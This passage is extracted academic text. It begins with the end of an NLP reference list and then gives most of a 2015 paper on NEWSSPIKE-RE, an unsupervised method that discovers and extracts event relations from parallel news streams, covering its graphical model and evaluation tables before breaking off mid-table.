estimation of word representa- tions in vector space. arXiv preprint arXiv:1301.3781. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013b. Distributed representations of words and phrases and their compositionality. arXiv preprint arXiv:1310.4546. Jeff Mitchell and Mirella Lapata. 2008. Vector-based models of semantic composition. In Association for Computational Linguistics (ACL), pages 236–244. Jeff Mitchell and Mirella Lapata. 2010. Composition in distributional models of semantics. Cognitive science, 34(8):1388–1429. Courtney Napoles, Matthew Gormley, and Benjamin Van Durme. 2012. Annotated gigaword. In ACL Joint Workshop on Automatic Knowledge Base Construction and Web-scale Knowledge Extraction, pages 95–100. Thien Huu Nguyen and Ralph Grishman. 2014. Employ- ing word representations and regularization for domain adaptation of relation extraction. In Association for Computational Linguistics (ACL), pages 68–74. Robert Parker, David Graff, Junbo Kong, Ke Chen, and Kazuaki Maeda. 2011. English gigaword fifth edition, june. Linguistic Data Consortium, LDC2011T07. Michael Roth and Kristian Woodsend. 2014. Compo- sition of word representations improves semantic role labelling. In Empirical Methods in Natural Language Processing (EMNLP), pages 407–413. Richard Socher, Christopher D Manning, and Andrew Y Ng. 2010. Learning continuous phrase representa- tions and syntactic parsing with recursive neural net- works. In NIPS Workshop on Deep Learning and Un- supervised Feature Learning, pages 1–9. Richard Socher, Jeffrey Pennington, Eric H Huang, An- drew Y Ng, and Christopher D Manning. 2011. Semi- supervised recursive autoencoders for predicting sen- timent distributions. In Empirical Methods in Natural Language Processing (EMNLP), pages 151–161. 241 Richard Socher, Brody Huval, Christopher D Manning, and Andrew Y Ng. 2012. Semantic compositionality through recursive matrix-vector spaces. In Empirical Methods in Natural Language Processing (EMNLP), pages 1201–1211. Richard Socher, John Bauer, Christopher D. Manning, and Ng Andrew Y. 2013a. Parsing with compositional vector grammars. In Association for Computational Linguistics (ACL), pages 455–465. Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Ng, and Christo- pher Potts. 2013b. Recursive deep models for se- mantic compositionality over a sentiment treebank. In Empirical Methods in Natural Language Processing (EMNLP), pages 1631–1642. Stefan Thater, Hagen Fürstenau, and Manfred Pinkal. 2011. Word meaning in context: A simple and ef- fective vector model. In International Joint Con- ference on Natural Language Processing (IJCNLP), pages 1134–1143. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Association for Compu- tational Linguistics (ACL), pages 384–394. Peter D Turney. 2012. Domain and function: A dual-space model of semantic relations and compo- sitions. Journal of Artificial Intelligence Research (JAIR), 44:533–585. Mo Yu and Mark Dredze. 2014. Improving lexical em- beddings with semantic knowledge. In Association for Computational Linguistics (ACL), pages 545–550. Mo Yu, Matthew Gormley, and Mark Dredze. 2014. Factor-based compositional embedding models. In NIPS Workshop on Learning Semantics. Mo Yu, Matthew R. Gormley, and Mark Dredze. 2015. Combining word embeddings and feature embeddings for fine-grained relation extraction. In North American Chapter of the Association for Computational Linguis- tics (NAACL). Fabio Massimo Zanzotto, Ioannis Korkontzelos, Francesca Fallucchi, and Suresh Manandhar. 2010. Estimating linear models for compositional distri- butional semantics. In International Conference on Computational Linguistics (COLING), pages 1263–1271. 242 work_rm5frn4rmvawvklaxkaojqxb6a ---- Exploiting Parallel News Streams for Unsupervised Event Extraction Congle Zhang, Stephen Soderland & Daniel S. Weld Computer Science & Engineering University of Washington Seattle, WA 98195, USA {clzhang, soderlan, weld}@cs.washington.edu Abstract Most approaches to relation extraction, the task of extracting ground facts from natural language text, are based on machine learning and thus starved by scarce training data. Man- ual annotation is too expensive to scale to a comprehensive set of relations. Distant super- vision, which automatically creates training data, only works with relations that already populate a knowledge base (KB). Unfortu- nately, KBs such as FreeBase rarely cover event relations (e.g. “person travels to loca- tion”). Thus, the problem of extracting a wide range of events — e.g., from news streams — is an important, open challenge. This paper introduces NEWSSPIKE-RE, a novel, unsupervised algorithm that discovers event relations and then learns to extract them. NEWSSPIKE-RE uses a novel probabilistic graphical model to cluster sentences describ- ing similar events from parallel news streams. These clusters then comprise training data for the extractor. Our evaluation shows that NEWSSPIKE-RE generates high quality train- ing sentences and learns extractors that per- form much better than rival approaches, more than doubling the area under a precision-recall curve compared to Universal Schemas. 1 Introduction Relation extraction, the process of extracting struc- tured information from natural language text, grows increasingly important for Web search and ques- tion answering. Traditional supervised approaches, which can achieve high precision and recall, are lim- ited by the cost of labeling training data and are un- likely to scale to the thousands of relations on the Web. Another approach, distant supervision (Craven and Kumlien, 1999; Wu and Weld, 2007), creates its own training data by matching the ground instances of a Knowledge base (KB) (e.g. Freebase) to the un- labeled text. Unfortunately, while distant supervision can work well in some situations, the method is limited to rela- tively static facts (e.g., born-in(person, location) or capital-of(location,location)) where there is a cor- responding knowledge base. But what about dy- namic event relations (also known as fluents), such as travel-to(person, location) or fire(organization, person)? Since these time-dependent facts are ephemeral, they are rarely stored in a pre-existing KB. At the same time, knowledge of real-time events is crucial for making informed decisions in fields like finance and politics. Indeed, news stories report events almost exclusively, so learning to ex- tract events is an important open problem. This paper develops a new unsupervised tech- nique, NEWSSPIKE-RE, to both discover event rela- tions and extract them with high precision. The in- tuition underlying NEWSSPIKE-RE is that the text of articles from two different news sources are not independent, since they are each conditioned on the same real-world events. By looking for rarely de- scribed entities that suddenly “spike” in popularity on a given date, one can identify paraphrases. Such temporal correspondence (Zhang and Weld, 2013) allow one to cluster diverse sentences, and the re- sulting clusters may be used to form training data in order to learn event extractors. Furthermore, one can also exploit parallel news to obtain direct negative evidence. To see this, suppose one day the news in- cludes the following: (a) “Snowden travels to Hong Kong, off southeastern China.” (b) “Snowden can- not stay in Hong Kong as Chinese officials will not allow ...” Since news stories are usually coherent, it is highly unlikely that travel to and stay in (which is negated) are synonymous. By leveraging such direct negative phrases, we can learn extractors capable of distinguishing heavily co-occurring but semantically different phrases, thereby avoiding many extraction errors. Our NEWSSPIKE-RE system encapuslates these intuitions in a novel graphical model making 117 Transactions of the Association for Computational Linguistics, vol. 3, pp. 117–129, 2015. Action Editor: Hal Daumé III. Submission batch: 10/2014; Revision batch 1/2015; Published 2/2015. c©2015 Association for Computational Linguistics. the following contributions: • We develop a method to discover a set of dis- tinct, salient event relations from news streams. • We describe an algorithm to exploit paral- lel news streams to cluster sentences that be- long to the same event relations. In particu- lar, we propose the temporal negation heuris- tic to avoid conflating co-occurring but non- synonymous phrases. • We introduce a probabilistic graphical model to generate training for a sentential event extractor without requiring any human annotations. • We present detailed experiments demonstrating that the event extractors, learned from the gener- ated training data, significantly outperform sev- eral competitive baselines, e.g. our system more than doubles the area under the micro-averaged, PR curve (0.80 vs. 0.30) compared to Riedel’s Universal Schema (Riedel et al., 2013). 2 Previous Work Supervised learning approaches have been widely developed for event extraction tasks such as MUC-4 and ACE. They often focus on a hand-crafted on- tology and train the extractor with manually created training data. While they can offer high precision and recall, they are often domain-specific (e.g. bio- logical events (Riedel et al., 2011; McClosky et al., 2011) and entertainment events (Benson et al., 2011; Reichart and Barzilay, 2012)), and are hard to scale over the events on the Web. Open IE systems extract open domain relations (e.g. (Banko et al., 2007; Fader et al., 2011)) and events (e.g. (Ritter et al., 2012)). They often perform self-supervised learning of relation-independent ex- tractions. It allows them to scale but makes them unable to output canonicalized relations. Distant supervised approaches have been devel- oped to learn extractors by exploiting the facts exis- ting in a knowledge base, thus avoiding human an- notation. Wu et al. (2007) and Reschke et al. (2014) learned Infobox relations from Wikipedia, while Mintz et al. (2009) heuristically matched Freebase facts to texts. Since the training data generated by the heuristic matching is often imperfect, multi- instance learning approaches (Riedel et al., 2010; Hoffmann et al., 2011; Surdeanu et al., 2012) have been developed to combat this problem. Unfortu- nately, most facts existing in the KBs are static facts like geographical or biographical data. They fall short of learning extractors for fluent facts such as sports results or travel and meetings by a person. Bootstrapping is another common extraction technique (Brin, 1999; Agichtein and Gravano, 2000; Carlson et al., 2010; Nakashole et al., 2011; Huang and Riloff, 2013). This typically takes a set of seeds as input, which can be ground instances or key phrases. The algorithms then iteratively gener- ate more positive instances and phrases. While there are many successful examples of bootstrapping, the challenge is to avoid semantic drift. Large-scale sys- tems, therefore, often require extra processing such as manual validation between the iterations or addi- tional negative seeds as the input. Unsupervised approaches have been developed for relation discovery and extractions. These algo- rithms are usually based on some clustering assump- tions over a large unlabeled corpus. Common as- sumptions include the distributional hypothesis used by (Hasegawa et al., 2004; Shinyama and Sekine, 2006), latent topic assumption by (Yao et al., 2012; Yao et al., 2011), and low rank assumption by (Taka- matsu et al., 2011; Riedel et al., 2013). Since the assumptions largely rely on co-occurrence, previous unsupervised approaches tend to confuse correlated but semantically different phrases during extraction. In contrast to this, our work largely avoids these er- rors by exploiting the temporal negation heuristic in parallel news streams. In addition, unlike many unsupervised algorithms requiring human effort to canonicalize the clusters, our work automatically discovers events with readable names. Paraphrasing techniques inspire our work. Some techniques, such as DIRT (Lin and Pantel, 2001) and Resolver (Yates and Etzioni, 2009), are based on the distributional hypothesis. Another common approach is to use parallel corpora, including news streams (Barzilay and Lee, 2003; Dolan et al., 2004; Zhang and Weld, 2013), multiple translations of the same story (Barzilay and McKeown, 2001) and bilingual sentence pairs (Ganitkevitch et al., 2013) to generate the paraphrases. Although these algo- rithms create many good paraphrases, they can not be directly used to generate enough training data to train a relation extractor for two reasons: first, the semantics of the paraphrases is often context depen- dent; second, the generated paraphrases are often in 118 Parallel news streams E=e(t1,t2) Event Discover event relations NewsSpike w/ Parallel sentences r1 r2 r3 (a1,a2,t) r1 r2 r3 r4 r5 r1 r2 r3 NS=(a1,a2,d,S) Group S={s1, s2 ,s3} r1 r2 r3 (a1,a2,t) r1 r2 r3 r4 r5 r1 r2 r3 E=e(t1,t2) s→E(a1,a2) s’→E(a’1,a’2) Generate training data Training sentences Event Extractor learn Test sentences input extract s→ E(a1,a2) Extractions s Training Phase Testing Phase Figure 1: During its training phase, NEWSSPIKE-RE first groups parallel sentences as NewsSpikes. Next, the system automatically discovers a set of event relations. Then, a probabilistic graphical model clusters sentences from the NewsSpike as training data for each discovered relation, which is used to learn sentential event extrac- tors. During the testing phase, the extractor takes test sentences as input and predicts event extractions. small clusters and it remains challenging to merge them for the purpose of training an extractor. Our work extends previous paraphrasing techniques, no- tably that of Zhang and Weld (2013), but we fo- cus on generating high-quality, positive and negative training sentences for the discovered events in order to learn extractors with high precision and recall. 3 System Overview News articles report an enormous number of events every day. Our system, NEWSSPIKE-RE, aligns paralel news streams to indentify and extract these events as shown in Figure 1. NEWSSPIKE-RE has both training and test phases. Its training phase has two main steps: event-relation discov- ery and training-set generation. Section 4 describes our event relation discovery algorithm, which pro- cesses time-stamped news articles to discern a set of salient, distinct event relations in the form of E = e(t1, t2), where e is a representative event phrase and ti are types of the two arguments. NEWSSPIKE-RE generates the event phrases using an Open Information Extraction (IE) system (Fader et al., 2011), and uses a fine-grained entity recogni- tion system FIGER (Ling and Weld, 2012) to gen- erate type descriptors such as “company ”, “politi- cian”, and “medical treatment”. The second part of NEWSSPIKE-RE’s training phase, described in Section 5, is a method for build- ing extractors for the discovered event relations. Our approach is motivated by the intuition, adapted from Zhang and Weld (2013), that articles from different news sources typically use different sentences to de- scribe the same event, and that corresponding sen- tences can be identified when they mention a unique pair of real-world entities. For example, when an un- usual entity pair (Selena, Norway) is suddenly seen in three articles on a single day: Selena traveled to Norway to see her ex-boyfriend. Selena arrived in Norway for a rendezvous with Justin. Selena’s trip to Norway was no coincidence. It is likely that all three refer to the same event re- lation, travel-to(person, location)1, and can be used as positive training examples for the relation. As in Zhang & Weld (2013), we group parallel sentences sharing the same argument pair and date in a struc- ture called a NewsSpike. However, we include all sentences mentioning the arguments (e.g. Selena’s trip to Norway) in the NewsSpike (not just those yielding OpenIE extractions), and use the lexical- ized dependency path between the arguments (e.g. <-[poss]-trip-[prep-to]->2, as the event phrase. In this way, we can generalize extractors beyond the scope of OpenIE. Formally, a NewsSpike is a tu- ple, (a1,a2,d,S), where a1 and a2 are arguments (e.g. Selena), d is a date, and S is a set of argument- labeled sentences {(s,a1,a2,p) . . .} in which s is a sentence with arguments ai and event phrase p. It’s important that non-synonomous sentences like “Selena stays in Norway” should be excluded from the training data for travel-to(person, loca- tion) even if a travel-to event did apply to that argu- ment pair. In order to select only the synonomous sentences, we develop a probabilistic graphical model, described in Section 5.2, to accurately as- sign sentences from NewsSpikes to each discov- ered event relation E. Given this annotated data, NEWSSPIKE-RE trains extractors using a multi- class logistic regression classfier. During the testing phase, NEWSSPIKE-RE ac- cepts arbitrary sentences (no date-stamp required), uses FIGER to identify possible arguments, and uses the classifier to predicts which events (if any) hold between an argument pair. We describe the extrac- tion process in Section 6. Note that NEWSSPIKE-RE is an unsupervised al- 1For clarity in the paper, we refer to this relation as travel-to, even though the phrase arrive in is actually more frequent and is selected as the name of this relation by our event discovery algorithm, as shown in Table 2. 2This dependency path will be referred to as “’s trip to”. 119 𝐸1 𝐸2 𝜂1 𝜂2 𝜂3 𝐸3 Figure 2: A simple example of the edge-cover algo- rithm with K=2, where Ei are event relations and ηj are NewsSpikes. The optimal solution selects E1 with edges to η1 and η2, and E3 with edge to η3. These two event relations cover all the NewsSpikes. gorithm that requires no manual labelling of the training instances. Like distant supervision, the key is to automatically generate the training data, at which point a traditional supervised classifier may be applied to learn an extractor. Because dis- tant supervision creates very noisy annotations, re- searchers often use specialized learners that model the correctness of a training example with a la- tent variable (Riedel et al., 2010; Hoffmann et al., 2011), but we found this unnecessary, because NEWSSPIKE-RE creates high quality training data. 4 Discovering Salient Events The first step of NEWSSPIKE-RE is to discover a set of event relations in the form of E = e(t1, t2), where e is an event phrase, and ti are fine-grained ar- gument types generated by FIGER, augmented with the important types “number” and “money”, which are recognized by the Stanford name entity recogni- tion system (Finkel et al., 2005). To be most useful, the discovered event relations should cover salient events that are frequently reported in the news ar- ticles. Formally, we say that a NewsSpike η = (a1,a2,d,S) mentions E = e(t1, t2) if the types of ai are ti for each i, and one of its sentence has e as the event phrase between the arguments. To max- imize the salience of the events, NEWSSPIKE-RE will prefer event relations that are “mentioned” by more NewsSpikes. In addition, the set of event relations should be distict. For example, if the relation travel-to(person, location) is already in the set, then visit(person, lo- cation) should not be selected as a separate relation. To reduce overlap, discovered event relations should not be mentioned by the same NewsSpike. Let E be all candidate event relations, N be all NewsSpikes. Our goal is to select the K most salient relations from E, minimizing overlap between re- lations. We can frame this task as a variant of the bipartite graph edge-cover problem. Let a bipartite graph G have one node Ei for each event relation in E and one node ηj for each NewsSpike in N . There is an edge between Ei and ηj if ηj mentions Ei. The edge-cover problem is to select a largest subset of edges subject to (1) at most K nodes of Ei are cho- sen and all edges incident to them are chosen as the covered edges; (2) each node of ηj is incident to at most one edge. The first constraint guarantees that there are exactly K event relations discovered; the second constraint ensures that no NewsSpike partic- ipates in two event relations. Figure 2 shows the optimized solution of a simple graph with K = 2, which can cover 3 edges with 2 event relations that have no overlapping NewsSpikes. Since both the objective function and constraints are linear, we can optimize this edge-cover problem with integer linear programming (Nemhauser and Wolsey, 1988). By solving the optimization prob- lem, NEWSSPIKE-RE finds a salient set of event re- lations incident to the covered edges. The discov- ered relations with K set to 30 are shown in Table 2 in Section 7. In addition, the covered edges bring us the initial mapping between the event types and NewsSpikes, which is used to train the probablistic model in Section 5.3. 5 Generating the Training Sentences After NEWSSPIKE-RE has discovered a set of event relations, it then generates training instances to learn an extractor for each relation. In this section, we present our algorithm for generating the training sentences. As shown in Figure 1, the generator takes N NewsSpikes {ηi = (a1i,a2i,di,Si)|i = 1 . . .N} and K event relations {Ek = ek(t1k, t2k)|k = 1 . . .K} as input. For every event relation, Ek, the generator identifies a subset of sentences from ∪Ni=1Si expressing the event relation as training sen- tences. In this section, we first characterize the paraphrased event phrases and the parallel sentences in NewsSpikes. Then we show how to encode this heuristic in a probabilistic graphical model that jointly paraphrases the event phrases and identifies a set of training sentences. 5.1 Exploiting Properties of Parallel News Previous work (Zhang and Weld, 2013) proposed several heuristics that are useful to find similar sen- tences in a NewsSpike. For example, the tempo- ral functionality heuristic says that sentences in a 120 NewsSpike with the same tense tend to be para- phrases. Unfortunately, these methods are too weak to generate enough data for training high quality event extractors: (1) they are “in-spike heuristics” that tend to generate small clusters from individual NewsSpikes. It remains unclear how to merge sim- ilar events occuring on different days and between different entities to increase cluster size. (2) they in- cluded heuristics to “gain precision at the expense of recall” (e.g. news articles do not state the same fact twice), because it is hard to obtain direct nega- tive phrases inside one NewsSpike. In this paper, we exploit news streams in a cross-spike, global man- ner to obtain accurate positive and negative signals. This allows us to dramatically improve recall while maintaining high precision. Our system starts from the basic observation that the parallel sentences tend to be coherent. So if a NewsSpike η = (a1,a2,d,S) is an instance of an event relation E = e(t1, t2), the event phrases in its parallel sentences tend to be paraphrases. But some- times the sentences in the NewsSpike are related but not paraphrases. For example, one day “Snowden will stay in Hong Kong ...” appears together with “Snowden travels to Hong Kong ...”. Although the fact stay-in(Snowden, Hong Kong) is true, it is harm- ful to include “Snowden will stay in Hong Kong” in the training for travel-to(person, location). Detecting paraphrases remains a challenge to most unsupervised approaches because they tend to cluster heavily co-occurring phrases which may turn out to be semantically different or even antony- mous. (Zhang and Weld, 2013) presented a method to avoid confusion between antonym and synonyms in NewsSpikes, but did not address the problem of related but different phrases like travel to and stay in in a NewsSpike. To handle this, our method rests on a simple ob- servation: when you read “Snowden travels to Hong Kong” and “Snowden cannot stay in Hong Kong as Chinese officials do not allow ...” in the same NewsSpike, it is unlike that travel to and stay in are synonymous event phrases because otherwise the two news stories are describing the opposite event. This observation leads to: Temporal Negation Heuristic. Two event phrases p and q tend to be semantically different if they co- occur in the NewsSpike but one of them is in negated form. The temporal negation heuristic helps in two ways: (1) it provides some direct negative phrases for the event relations; NEWSSPIKE-RE uses these to heuristically label some variables in the model. (2) It creates some useful features to implement a form of transitvity. For example, if we find that live in and stay in are frequently co-occurring and the temporal negation heuristic tells us that travel to and stay in are not paraphrases, this is evidence that live in is unlikely to be a paraphrase of travel to, even if they are heavily co-occurring. The following section describes our implementa- tion that uses these properties to generate high qual- ity training. Our goal is the following: a sentence (s,a1,a2,p) from NewsSpike η = (a1,a2,d,S) should be included in the training data for event re- lation E = e(t1, t2) if the event phrase p is a para- phrase of e and the event relation E happens to the argument pair (a1,a2) at time d. 5.2 Joint Cluster Model As discussed above, to identify a high quality set of training sentences from NewsSpikes, one needs to combine evidence that event phrases are paraphrases with evidence from NewsSpikes. For this purpose, we define an undirected graphical model to jointly reason about paraphrasing the event phrases and identifying the training sentences from NewsSpikes. We first list the notation used in this section: E event relation p ∈ P event phrases s ∈ Sp sentences w/ the event phrase p Y p Is p a paraphrase for E? Zsp Is s w/ p good training for E? Φ factors Let P be the union of all the event phrases from every NewsSpike. For each p ∈ P , let Sp be the set of sentences having p as its event phrase. Figure 3(a) shows the model in plate form. There are two kinds of random variables corresponding to phrases and sentences, respectively. For each event relation E = e(t1, t2), there exists a connected com- ponent for every event phrase p ∈ P that models (1) whether p is a paraphrase of e or not (modeled us- ing Boolean phrase variables, Y p); and (2) whether each sentence of Sp is a good training sentence for E (modeled using |Sp| Boolean sentence variables {Zsp|s ∈ Sp}. Intuitively, the goal of the model is to find the set of good training sentences, with 121 𝑝 𝑌 𝑆𝑝 𝑍𝑖 (a) 1 𝑍1 1 𝑌 ′s trip to 1 0 Selena Gomez’s trip to Norway … for UCLA’s trip to Nebraska Tsarnaev’s six-month trip to Russia escapes the FBI’s attention 𝑍2 𝑍3 Φjoint Φphrase Φin Φcross (b) 0 0 𝑌stay in 0 Snowden plans to stay in Hongkong Manziel stays in Austin to attend a fraternity party 𝑍2𝑍1 Φjoint Φphrase Φin (c) Figure 3: (a) The connected components depicted as plate model, where each Y is a Boolean variable for a relation phrase and each Z is a Boolean variable for a training sentence for with that phrase; (b) and (c) are example connected components for the event phrases ’s trip to and stay in respectively. The goal of the model is to set Y = 1 for good paraphrases of a relation and to set Z = 1 for good training sentences. Zsp = 1. The union of such sentences over the dif- ferent phrases, ∪p{s|Zsp = 1}, defines the training sentences for the event. Figure 3(b) and 3(c) show two example connected-components for the event phrases ’s trip to and stay in respectively. Now, we can define the joint distribution over the event phrases and the sentences. The joint dis- tribution is a function defined on factors that en- code our observations about NewsSpikes as features and constraints. The phrase factor Φphrase is a log- linear function attaching to Y p with the paraphras- ing features, such as whether p and e co-occur in the NewsSpikes, or whether p shares the same head word with e. They are used to distinguish whether p is a good event phrase. A sentence should not be identified as a good training sentence if it does not contain a positive event phrase. For example, if Y stay in in Figure 3(b) takes the value of 0, thus all sentences with the event phrase stay in should also take the value of 0. We implement this constraint with a joint factor Φjoint among Y p and Zsp variable. In addition, good training sentences occur when the NewsSpike is an event instance. To encode this observation, we need to featurize the NewsSpikes and let them bias the assignments. Our model im- plements this with two types of log-linear factors: (1) the unary in-spike factor Φin depends on the sen- tence variables and contains features about the cor- responding NewsSpike. The factor is used to dis- tinguish whether the NewsSpike is an instance of e(t1, t2), such as whether the argument types of the NewsSpike match the designated types t1, t2; (2) the pairwise cross-spike factors Φcross connect pairs of sentences. This uses features such as whether the pair of NewsSpikes for the two sentences have high textual similarity, and whether two NewsSpikes con- tain negated event phrases. We define the joint distribution for the connected component for p as follows. Let Z be the vector of sentence variables, let x be the features. The joint distribution is: p(Y = y, Z = z|x; Θ) def= 1 Zx Φphrase(y, x) ×Φjoint(y,z) ∏ s Φin(zs,x) ∏ s,s′ Φcross(zs,zs ′ ,x) where the parameter vector Θ is the weight vec- tor of the features in Φin and Φcross, which are log- linear functions. The joint factors Φjoint is zero when Y p = 0 but some Zsp = 1. Otherwise, it is set to 1. We use integer linear programming to perform MAP inference on the model, finding the predictions y,z that maximize the probability. 5.3 Learning from Heuristic Labels We now present the learning algorithm for our joint cluster model. The goal of the learning algorithm is to set Θ for the log-linear functions in the factors in a way that maximizes the likelihood estimation. We do this in a totally unsupervised manner, since manual annotation is expensive and not scalable to large numbers of event relations. The weights are learned in three steps: (1) NEWSSPIKE-RE creates a set of heuristic labels for a subset of variables in the graphical model; (2) it uses the heuristic labels as supervision for the model; (3) it updates Θ with the perceptron learning algorithm. The weights are used to infer the values of the variables that don’t have heuristic labels. The procedure is summarized in Figure 4. For each event relation E = e(t1, t2), NEWSSPIKE-RE creates heuristic labels as follows: 122 Input: NewsSpikes and the connected components of the model; Heuristic Labels: 1. find positive and negative phrases and sentences P+,P−,S+,S−; 2. label the connected componenets accordingly and create {(Y labeli ,Zlabeli ) |Mi=1}. Learning: Update Θ with the perceptron learning al- gorithm. Output: the values of all variables in the connected components with the MAP inference. Figure 4: Learning from Heuristic Labels (1) P+: the temporal functionality heuristic (Zhang and Weld, 2013) says that if an event phrase p co- occurs with e in the NewsSpikes, it tends to be a paraphrase of e. We add the most frequently co- occurring event phrases to P+. P+ also includes e itself. (2) P−: the temporal negation heuristic says that if p and e co-occur in the NewsSpike but one of them is in its negated form, p should be nega- tively labeled. We add those event phrases to P−. If a phrase p appears in both P+ and P−, we re- move it from both sets. (3) S+: we first get the positive NewsSpikes from the solution of the edge- cover problem in section 4. We treat the NewsSpike η as positive if the edge between η and E is cov- ered. Next, every sentence with p ∈ P+ is added into S+. (4) S−: since the event relations discovered in section 4 tend to be distinct relations, a sentence is treated as negative sentence for E if it is heuris- tically labeled as positive for E′ 6= E. In addition, S− includes all sentences with p ∈ P−. With P+,P−,S+,S−, we define the heuristic la- beled set to be {(Y labeli ,Zlabeli ) |Mi=1}, where M is the number of the connected components with the corresponding event phrases p ∈ P+ ∪ P−; Y labeli = 1 if p ∈ P+ and Y labeli = 0 if p ∈ P−. Zi is labeled similarly, but note that if the sentence in the connected component doesn’t exist in S+ ∪S−, NEWSSPIKE-RE doesn’t include the corresponding variable in Zlabeli . With {(Y labeli ,Zlabeli ) |Mi=1}, learn- ing can be done with maximum likelihood estima- tion as L(Θ) = log ∏ i p(Yi = y label i ,Zi = z label i | xi, Θ). Following (Collins, 2002), we use a fast per- ceptron learning approach to update Θ. It consists of iterating two steps: (1) MAP inference given the current weight; (2) penalizing the weights if the in- ferred assignments are different from the heuristic labeled assignments. 6 Sentential Event Extraction As shown in Figure 1, we learn the extractors from the generated training sentences. Note that most dis- tant supervised (Hoffmann et al., 2011; Surdeanu et al., 2012) approaches use multi-instance, aggregate- level training (i.e. the supervision comes from la- beled sets of instances instead of individually la- beled sentences). Coping with the noise inherent in these multi-instance bags remains a big challenge for distant supervision. In contrast, our sentence- level training data is more direct and minimizes noise. Therefore, we implement the event extrac- tor as a simple multi-class, L2-regularized logistic regression classifier. For features of the classifier, we use the lexi- calized dependency paths, the OpenIE phrases, the minimal subtree of the dependency parse and the bag-of-words between the arguments. We also aug- ment them with fine grained argument types pro- duced by FIGER (Ling and Weld, 2012). The event extractor that is learned can take individual test sen- tences (s,a1,a2) as input and predict whether that sentence expresses the event between (a1,a2). 7 Empirical Evaluation Our evaluation addresses two questions. Section 7.2 considers whether our training generation algorithm identifies accurate and diverse sentences. Then, Section 7.3 investigates whether the event extrac- tor, learned from the training sentences, outperforms other extraction approaches. 7.1 Experimental Setup We follow the procedure described in (Zhang and Weld, 2013) to collect parallel news streams and generate the NewsSpikes: first, we get news seeds and query the Bing newswire search engine to gather additional, time-stamped, news articles on a simi- lar topic; next, we extract OpenIE tuples from the news articles and group the sentences that share the same arguments and date into NewsSpikes. We col- lected the news stream corpus from March 1st 2013 to July 1st 2014. We split the dataset into two parts: in the training phrase, we use the news streams in 2013 (named NS13) to generate the training sen- tences. NS13 has 33k NewsSpikes containing 173k sentences. We evaluated the extraction performance on news articles collected in 2014 (named NS14). In this 123 way, we make sure the test sentences are unseen during training. There are 15 million sentences in NS14. We randomly sample 100k unique sentences having two different arguments recognized by the name entity recognition system. For our event discovery algorithm, we set the number of event relations to be 30 and ran the al- gorithm on NS13. The algorithm takes 6 seconds to run on a 2.3GHz CPU. Note that most previous unsupervised relation discovery algorithms require additional manual post-processing to assign names to the output clusters. In contrast, NEWSSPIKE-RE discovers the event relations fully automatically and the output is self-explanatory. We list them together with the by-event extraction performance in Table 2. From the table, we can see that most of the discov- ered event relations are salient with little overlap be- tween relations. While we arbitrarily set K to 30 in our experi- ments, there is no inherent limit to the number of relation phrases as long as the news corpus provides sufficient support to learn an extractor for each rela- tion. In future, we plan to explore much larger sets of event relations to see if the extraction accuracy is maintained. The joint cluster model that identifies training sentences for each event relation E = e(t1, t2) uses cosine similarity between the event phrase p of a sentence and the canonical phrases of each relation as features in the phrase factors in Figure 3(a). It also includes the cosine similarity between p and a set of “anti-phrases” for the event relation which are recognized by the temporal negation heuristic. For the in-spike factor, we measure whether the fine-grained argument types of the sentence returned from the FIGER system matches the required ti respectively. In addition, we implement the fea- tures from (Zhang and Weld, 2013) to measure whether the sentence is describing the event of the NewsSpike. For the cross-spike factors, we use tex- tual similarity features between the two sets of par- allel sentences to measure the distance between the pair of NewsSpikes. 7.2 Quality of the Generated Training Set The key to a good learning system is a high-quality training set. In this section, we compare our joint model against pipeline systems that consider para- phrases and argument type matching sequentially, system all diverse # mi. ma. # mi. ma. Basic 43,718 .50 .62 12,701 .38 .51 Yates09 15,212 .78 .76 586 .48 .50 Ganit13 14,420 .74 .71 1,210 .53 .53 Zhang13 14,804 .76 .75 890 .63 .61 NEWSSPIKE-RE 20,105 .88 .89 2,156 .71 .72 w/o cross 16,463 .86 .86 1,883 .67 .69 w/o neg 33,548 .76 .81 4,019 .64 .68 Table 1: Quality of the generated training sentences (count, micro- and macro- accuracy), where “all” in- cludes sentences with all event phrases and “diverse” are those with distinct event phrases. based on the following paraphrasing techniques. Basic is based on the temporal functionality heuristic of (Zhang and Weld, 2013). It treats all event phrases appearing in the same NewsSpike as paraphrases. Yates09 uses Resolver (Yates and Etzioni, 2009) to create clusters of phrases. Re- solver measures the similarity between the phrases by means of both distributional features and textual features. We convert the sentences in NewsSpikes into tuples in the form of (a1,p,a2), and run Re- solver on these tuples to generate the paraphrases. Zhang13: We used the generated paraphrase set from (Zhang and Weld, 2013). Ganit13: Gan- itkevitch et al. (2013) released a large paraphrase database (PPDB) based on exploiting the bilingual parallel corpora. Note that some of these para- phrasing systems do not handle dependency paths. So when p is a dependency path, we use the sur- face string between the arguments as the phrase. NewsSpike-RE: We also conduct ablation testing on NEWSSPIKE-RE to measure the effect of the cross-spike factors and the temporal negation heuris- tic: w/o Cross uses a simpler model by remov- ing the cross-spike factors of NEWSSPIKE-RE; w/o Negation uses the same joint cluster model as NEWSSPIKE-RE but removes the features and the heuristic labels coming from the temporal negation heuristic. We measured the micro- and macro- accuracy of each system by manually labeling 1000 randomly chosen output from each system3. Annotators read each training sentence, and decided if it was a good example for a particular event. We also report the number of generated sentences. Since the extrac- tor should generalize over sentences with dissimilar expressions, it is crucial to identify sentences with 3Two Odesk workers were asked to label the dataset, a grad- uate student then reconciled any disagreements. 124 Event F1 @ max recall area u/ PR curve area u/ diverse PR curve # R13 R13P N-RE R13 R13P N-RE # R13 R13P N-RE acquire(organization,person) 59 0.34 0.33 0.58 0.26 0.26 0.57 20 0.26 0.17 0.58 arrive in(organization,location) 95 0.11 0.40 0.56 0.01 0.12 0.42 18 0.01 0.02 0.50 arrive in(person,location) 130 0.61 0.86 0.86 0.35 0.67 0.93 18 0.26 0.33 0.80 beat(organization,organization) 178 0.42 0.85 0.90 0.14 0.64 0.84 24 0.06 0.53 0.58 beat(person,person) 107 0.57 0.82 0.94 0.21 0.53 0.91 14 0.08 0.25 0.77 buy(organization,organization) 84 0.47 0.47 0.78 0.25 0.50 0.82 34 0.19 0.40 0.79 defend(person,person) 41 0.37 0.38 0.52 0.36 0.47 0.65 12 0.13 0.06 0.47 die at(person,number) 158 0.53 0.97 0.98 0.31 0.93 0.97 17 0.33 0.83 0.94 die(person,time) 179 0.85 0.91 0.97 0.66 0.80 0.96 16 0.22 0.63 